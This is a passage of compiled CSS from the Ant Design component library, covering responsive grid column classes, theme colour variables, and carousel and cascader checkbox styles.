91.66666667%; } .ant-col-xxl-push-22 { left: 91.66666667%; } .ant-col-xxl-pull-22 { right: 91.66666667%; } .ant-col-xxl-offset-22 { margin-left: 91.66666667%; } .ant-col-xxl-order-22 { order: 22; } .ant-col-xxl-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-xxl-push-21 { left: 87.5%; } .ant-col-xxl-pull-21 { right: 87.5%; } .ant-col-xxl-offset-21 { margin-left: 87.5%; } .ant-col-xxl-order-21 { order: 21; } .ant-col-xxl-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-xxl-push-20 { left: 83.33333333%; } .ant-col-xxl-pull-20 { right: 83.33333333%; } .ant-col-xxl-offset-20 { margin-left: 83.33333333%; } .ant-col-xxl-order-20 { order: 20; } .ant-col-xxl-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-xxl-push-19 { left: 79.16666667%; } .ant-col-xxl-pull-19 { right: 79.16666667%; } .ant-col-xxl-offset-19 { margin-left: 79.16666667%; } .ant-col-xxl-order-19 { order: 19; } .ant-col-xxl-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-xxl-push-18 { left: 75%; } .ant-col-xxl-pull-18 { right: 75%; } .ant-col-xxl-offset-18 { margin-left: 75%; } .ant-col-xxl-order-18 { order: 18; } .ant-col-xxl-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-xxl-push-17 { left: 70.83333333%; } .ant-col-xxl-pull-17 { right: 70.83333333%; } .ant-col-xxl-offset-17 { margin-left: 70.83333333%; } .ant-col-xxl-order-17 { order: 17; } .ant-col-xxl-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-xxl-push-16 { left: 66.66666667%; } .ant-col-xxl-pull-16 { right: 66.66666667%; } .ant-col-xxl-offset-16 { margin-left: 66.66666667%; } .ant-col-xxl-order-16 { order: 16; } .ant-col-xxl-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-xxl-push-15 { left: 62.5%; } .ant-col-xxl-pull-15 { right: 62.5%; } .ant-col-xxl-offset-15 { margin-left: 62.5%; } .ant-col-xxl-order-15 { order: 15; } .ant-col-xxl-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-xxl-push-14 { left: 58.33333333%; } .ant-col-xxl-pull-14 { right: 58.33333333%; } .ant-col-xxl-offset-14 { margin-left: 58.33333333%; } .ant-col-xxl-order-14 { order: 14; } .ant-col-xxl-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-xxl-push-13 { left: 54.16666667%; } .ant-col-xxl-pull-13 { right: 54.16666667%; } .ant-col-xxl-offset-13 { margin-left: 54.16666667%; } .ant-col-xxl-order-13 { order: 13; } .ant-col-xxl-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-xxl-push-12 { left: 50%; } .ant-col-xxl-pull-12 { right: 50%; } .ant-col-xxl-offset-12 { margin-left: 50%; } .ant-col-xxl-order-12 { order: 12; } .ant-col-xxl-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-xxl-push-11 { left: 45.83333333%; } .ant-col-xxl-pull-11 { right: 45.83333333%; } .ant-col-xxl-offset-11 { margin-left: 45.83333333%; } .ant-col-xxl-order-11 { order: 11; } .ant-col-xxl-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-xxl-push-10 { left: 41.66666667%; } .ant-col-xxl-pull-10 { right: 41.66666667%; } .ant-col-xxl-offset-10 { margin-left: 41.66666667%; } .ant-col-xxl-order-10 { order: 10; } .ant-col-xxl-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-xxl-push-9 { left: 37.5%; } .ant-col-xxl-pull-9 { right: 37.5%; } .ant-col-xxl-offset-9 { margin-left: 37.5%; } .ant-col-xxl-order-9 { order: 9; } .ant-col-xxl-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-xxl-push-8 { left: 33.33333333%; } .ant-col-xxl-pull-8 { right: 33.33333333%; } .ant-col-xxl-offset-8 { margin-left: 33.33333333%; } .ant-col-xxl-order-8 { order: 8; } .ant-col-xxl-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-xxl-push-7 { left: 29.16666667%; } .ant-col-xxl-pull-7 { right: 29.16666667%; } .ant-col-xxl-offset-7 { margin-left: 29.16666667%; } .ant-col-xxl-order-7 { order: 7; } .ant-col-xxl-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-xxl-push-6 { left: 25%; } .ant-col-xxl-pull-6 { right: 25%; } .ant-col-xxl-offset-6 { margin-left: 25%; } .ant-col-xxl-order-6 { order: 6; } .ant-col-xxl-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-xxl-push-5 { left: 20.83333333%; } .ant-col-xxl-pull-5 { right: 20.83333333%; } .ant-col-xxl-offset-5 { margin-left: 20.83333333%; } .ant-col-xxl-order-5 { order: 5; } .ant-col-xxl-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-xxl-push-4 { left: 16.66666667%; } .ant-col-xxl-pull-4 { right: 16.66666667%; } .ant-col-xxl-offset-4 { margin-left: 16.66666667%; } .ant-col-xxl-order-4 { order: 4; } .ant-col-xxl-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-xxl-push-3 { left: 12.5%; } .ant-col-xxl-pull-3 { right: 12.5%; } .ant-col-xxl-offset-3 { margin-left: 12.5%; } .ant-col-xxl-order-3 { order: 3; } .ant-col-xxl-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-xxl-push-2 { left: 8.33333333%; } .ant-col-xxl-pull-2 { right: 8.33333333%; } .ant-col-xxl-offset-2 { margin-left: 8.33333333%; } .ant-col-xxl-order-2 { order: 2; } .ant-col-xxl-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-xxl-push-1 { left: 4.16666667%; } .ant-col-xxl-pull-1 { right: 4.16666667%; } .ant-col-xxl-offset-1 { margin-left: 4.16666667%; } .ant-col-xxl-order-1 { order: 1; } .ant-col-xxl-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-xxl-push-0 { left: auto; } .ant-col-xxl-pull-0 { right: auto; } .ant-col-xxl-offset-0 { margin-left: 0; } .ant-col-xxl-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-xxl-push-0.ant-col-rtl { right: auto; } .ant-col-xxl-pull-0.ant-col-rtl { left: auto; } .ant-col-xxl-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-xxl-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-xxl-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-xxl-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-xxl-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-xxl-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-xxl-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-xxl-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-xxl-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-xxl-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-xxl-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-xxl-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-xxl-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-xxl-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-xxl-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-xxl-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-xxl-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-xxl-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-xxl-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-xxl-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-xxl-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-xxl-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-xxl-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-xxl-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-xxl-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-xxl-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-xxl-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-xxl-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-xxl-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-xxl-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-xxl-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-xxl-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-xxl-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-xxl-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-xxl-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-xxl-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-xxl-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-xxl-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-xxl-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-xxl-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-xxl-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-xxl-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-xxl-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-xxl-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-xxl-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-xxl-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-xxl-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-xxl-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-xxl-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-xxl-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-xxl-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-xxl-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-xxl-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-xxl-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-xxl-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-xxl-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-xxl-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-xxl-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-xxl-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-xxl-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-xxl-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-xxl-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-xxl-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-xxl-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-xxl-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-xxl-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-xxl-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-xxl-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-xxl-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-xxl-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-xxl-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-xxl-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-xxl-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } } .ant-row-rtl { direction: rtl; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-carousel { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; } .ant-carousel .slick-slider { position: relative; display: block; box-sizing: border-box; touch-action: pan-y; -webkit-touch-callout: none; -webkit-tap-highlight-color: transparent; } .ant-carousel .slick-list { position: relative; display: block; margin: 0; padding: 0; overflow: hidden; } .ant-carousel .slick-list:focus { outline: none; } .ant-carousel .slick-list.dragging { cursor: pointer; } .ant-carousel .slick-list .slick-slide { pointer-events: none; } .ant-carousel .slick-list .slick-slide input.ant-radio-input, .ant-carousel .slick-list .slick-slide input.ant-checkbox-input { visibility: hidden; } .ant-carousel .slick-list .slick-slide.slick-active { pointer-events: auto; } .ant-carousel .slick-list .slick-slide.slick-active input.ant-radio-input, .ant-carousel .slick-list .slick-slide.slick-active input.ant-checkbox-input { visibility: visible; } .ant-carousel .slick-list .slick-slide > div > div { vertical-align: bottom; } .ant-carousel .slick-slider .slick-track, .ant-carousel .slick-slider .slick-list { transform: translate3d(0, 0, 0); touch-action: pan-y; } .ant-carousel .slick-track { position: relative; top: 0; left: 0; display: block; } .ant-carousel .slick-track::before, .ant-carousel .slick-track::after { display: table; content: ''; } .ant-carousel .slick-track::after { clear: both; } .slick-loading .ant-carousel .slick-track { visibility: hidden; } .ant-carousel .slick-slide { display: none; float: left; height: 100%; min-height: 1px; } .ant-carousel .slick-slide img { display: block; } .ant-carousel .slick-slide.slick-loading img { display: none; } .ant-carousel .slick-slide.dragging img { pointer-events: none; } .ant-carousel .slick-initialized .slick-slide { display: block; } .ant-carousel .slick-loading .slick-slide { visibility: hidden; } .ant-carousel .slick-vertical .slick-slide { display: block; height: auto; } .ant-carousel .slick-arrow.slick-hidden { display: none; } .ant-carousel .slick-prev, .ant-carousel .slick-next { position: absolute; top: 50%; display: block; width: 20px; height: 20px; margin-top: -10px; padding: 0; color: transparent; font-size: 0; line-height: 0; background: transparent; border: 0; outline: none; cursor: pointer; } .ant-carousel .slick-prev:hover, .ant-carousel .slick-next:hover, .ant-carousel .slick-prev:focus, .ant-carousel .slick-next:focus { color: transparent; background: transparent; outline: none; } .ant-carousel .slick-prev:hover::before, .ant-carousel .slick-next:hover::before, .ant-carousel .slick-prev:focus::before, .ant-carousel .slick-next:focus::before { opacity: 1; } .ant-carousel .slick-prev.slick-disabled::before, .ant-carousel .slick-next.slick-disabled::before { opacity: 0.25; } .ant-carousel .slick-prev { left: -25px; } .ant-carousel .slick-prev::before { content: '←'; } .ant-carousel .slick-next { right: -25px; } .ant-carousel .slick-next::before { content: '→'; } .ant-carousel .slick-dots { position: absolute; right: 0; bottom: 0; left: 0; z-index: 15; display: flex !important; justify-content: center; margin-right: 15%; margin-left: 15%; padding-left: 0; list-style: none; } .ant-carousel .slick-dots-bottom { bottom: 12px; } .ant-carousel .slick-dots-top { top: 12px; bottom: auto; } .ant-carousel .slick-dots li { position: relative; display: inline-block; flex: 0 1 auto; box-sizing: content-box; width: 16px; height: 3px; margin: 0 2px; margin-right: 3px; margin-left: 3px; padding: 0; text-align: center; text-indent: -999px; vertical-align: top; transition: all 0.5s; } .ant-carousel .slick-dots li button { display: block; width: 100%; height: 3px; padding: 0; color: transparent; font-size: 0; background: #fff; border: 0; border-radius: 1px; outline: none; cursor: pointer; opacity: 0.3; transition: all 0.5s; } .ant-carousel .slick-dots li button:hover, .ant-carousel .slick-dots li button:focus { opacity: 0.75; } .ant-carousel .slick-dots li.slick-active { width: 24px; } .ant-carousel .slick-dots li.slick-active button { background: #fff; opacity: 1; } .ant-carousel .slick-dots li.slick-active:hover, .ant-carousel .slick-dots li.slick-active:focus { opacity: 1; } .ant-carousel-vertical .slick-dots { top: 50%; bottom: auto; flex-direction: column; width: 3px; height: auto; margin: 0; transform: translateY(-50%); } .ant-carousel-vertical .slick-dots-left { right: auto; left: 12px; } .ant-carousel-vertical .slick-dots-right { right: 12px; left: auto; } .ant-carousel-vertical .slick-dots li { width: 3px; height: 16px; margin: 4px 2px; vertical-align: baseline; } .ant-carousel-vertical .slick-dots li button { width: 3px; height: 16px; } .ant-carousel-vertical .slick-dots li.slick-active { width: 3px; height: 24px; } .ant-carousel-vertical .slick-dots li.slick-active button { width: 3px; height: 24px; } .ant-carousel-rtl { direction: rtl; } .ant-carousel-rtl .ant-carousel .slick-track { right: 0; left: auto; } .ant-carousel-rtl .ant-carousel .slick-prev { right: -25px; left: auto; } .ant-carousel-rtl .ant-carousel .slick-prev::before { content: '→'; } .ant-carousel-rtl .ant-carousel .slick-next { right: auto; left: -25px; } .ant-carousel-rtl .ant-carousel .slick-next::before { content: '←'; } .ant-carousel-rtl.ant-carousel .slick-dots { flex-direction: row-reverse; } .ant-carousel-rtl.ant-carousel-vertical .slick-dots { flex-direction: column; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } @-webkit-keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } .ant-cascader-checkbox { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; top: 0.2em; line-height: 1; white-space: nowrap; outline: none; cursor: pointer; } .ant-cascader-checkbox-wrapper:hover .ant-cascader-checkbox-inner, .ant-cascader-checkbox:hover .ant-cascader-checkbox-inner, .ant-cascader-checkbox-input:focus + .ant-cascader-checkbox-inner { border-color: var(--ant-primary-color); } .ant-cascader-checkbox-checked::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 2px; visibility: hidden; -webkit-animation: antCheckboxEffect 0.36s ease-in-out; animation: antCheckboxEffect 0.36s ease-in-out; -webkit-animation-fill-mode: backwards; animation-fill-mode: backwards; content: ''; } .ant-cascader-checkbox:hover::after, .ant-cascader-checkbox-wrapper:hover .ant-cascader-checkbox::after { visibility: visible; } .ant-cascader-checkbox-inner { position: relative; top: 0; left: 0; display: block; width: 16px; height: 16px; direction: ltr; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; border-collapse: separate; transition: all 0.3s; } .ant-cascader-checkbox-inner::after { position: absolute; top: 50%; left: 21.5%; display: table; width: 5.71428571px; height: 9.14285714px; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(0) translate(-50%, -50%); opacity: 0; transition: all 0.1s cubic-bezier(0.71, -0.46, 0.88, 0.6), opacity 0.1s; content: ' '; } .ant-cascader-checkbox-input { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; width: 100%; height: 100%; cursor: pointer; opacity: 0; } .ant-cascader-checkbox-checked .ant-cascader-checkbox-inner::after { position: absolute; display: table; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(1) translate(-50%, -50%); opacity: 1; transition: all 0.2s cubic-bezier(0.12, 0.4, 0.29, 1.46) 0.1s; content: ' '; } .ant-cascader-checkbox-checked .ant-cascader-checkbox-inner { background-color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-cascader-checkbox-disabled { cursor: not-allowed; } .ant-cascader-checkbox-disabled.ant-cascader-checkbox-checked .ant-cascader-checkbox-inner::after { border-color: rgba(0, 0, 0, 0.25); -webkit-animation-name: none; animation-name: none; } .ant-cascader-checkbox-disabled .ant-cascader-checkbox-input { cursor: not-allowed; } .ant-cascader-checkbox-disabled .ant-cascader-checkbox-inner { background-color: #f5f5f5; border-color: #d9d9d9 !important; } .ant-cascader-checkbox-disabled .ant-cascader-checkbox-inner::after { border-color: #f5f5f5; border-collapse: separate; -webkit-animation-name: none; animation-name: none; } .ant-cascader-checkbox-disabled + span { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-cascader-checkbox-disabled:hover::after, .ant-cascader-checkbox-wrapper:hover .ant-cascader-checkbox-disabled::after { visibility: hidden; } .ant-cascader-checkbox-wrapper { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-flex; align-items: baseline; line-height: unset; cursor: pointer; } .ant-cascader-checkbox-wrapper::after { display: inline-block; width: 0; overflow: hidden; content: '\a0'; } .ant-cascader-checkbox-wrapper.ant-cascader-checkbox-wrapper-disabled { cursor: not-allowed; } .ant-cascader-checkbox-wrapper + .ant-cascader-checkbox-wrapper { margin-left: 8px; } .ant-cascader-checkbox + span { padding-right: 8px; padding-left: 8px; } .ant-cascader-checkbox-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; } .ant-cascader-checkbox-group-item { margin-right: 8px; } .ant-cascader-checkbox-group-item:last-child { margin-right: 0; } .ant-cascader-checkbox-group-item + .ant-cascader-checkbox-group-item { margin-left: 0; } .ant-cascader-checkbox-indeterminate .ant-cascader-checkbox-inner { background-color: #fff; border-color: #d9d9d9; } .ant-cascader-checkbox-indeterminate .ant-cascader-checkbox-inner::after { top: 50%; left: 50%; width: 8px; height: 8px; background-color: var(--ant-primary-color); border: 0; transform: translate(-50%, -50%) scale(1); opacity: 1; content: ' '; } .ant-cascader-checkbox-indeterminate.ant-cascader-checkbox-disabled .ant-cascader-checkbox-inner::after { background-color: rgba(0, 0, 0, 0.25); border-color: rgba(0, 0, 0, 0.25); } .ant-cascader { width: 184px; } .ant-cascader-checkbox { top: 0; margin-right: 8px; } .ant-cascader-menus { display: flex; flex-wrap: nowrap; align-items: flex-start; } .ant-cascader-menus.ant-cascader-menu-empty .ant-cascader-menu { width: 100%; height: auto; } .ant-cascader-menu { min-width: 111px; height: 180px; margin: 0; margin: -4px 0; padding: 4px 0; overflow: auto; vertical-align: top; list-style: none; border-right: 1px solid #f0f0f0; -ms-overflow-style: -ms-autohiding-scrollbar; } .ant-cascader-menu-item { display: flex; flex-wrap: nowrap; align-items: center; padding: 5px 12px; overflow: hidden; line-height: 22px; white-space: nowrap; text-overflow: ellipsis; cursor: pointer; transition: all 0.3s; } .ant-cascader-menu-item:hover { background: #f5f5f5; } .ant-cascader-menu-item-disabled { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-cascader-menu-item-disabled:hover { background: transparent; } .ant-cascader-menu-empty .ant-cascader-menu-item { color: rgba(0, 0, 0, 0.25); cursor: default; pointer-events: none; } .ant-cascader-menu-item-active:not(.ant-cascader-menu-item-disabled), .ant-cascader-menu-item-active:not(.ant-cascader-menu-item-disabled):hover { font-weight: 600; background-color: var(--ant-primary-1); } .ant-cascader-menu-item-content { flex: auto; } .ant-cascader-menu-item-expand .ant-cascader-menu-item-expand-icon, .ant-cascader-menu-item-loading-icon { margin-left: 4px; color: rgba(0, 0, 0, 0.45); font-size: 10px; } .ant-cascader-menu-item-disabled.ant-cascader-menu-item-expand .ant-cascader-menu-item-expand-icon, .ant-cascader-menu-item-disabled.ant-cascader-menu-item-loading-icon { color: rgba(0, 0, 0, 0.25); } .ant-cascader-menu-item-keyword { color: #ff4d4f; } .ant-cascader-rtl .ant-cascader-menu-item-expand-icon, .ant-cascader-rtl .ant-cascader-menu-item-loading-icon { margin-right: 4px; margin-left: 0; } .ant-cascader-rtl .ant-cascader-checkbox { top: 0; margin-right: 0; margin-left: 8px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; 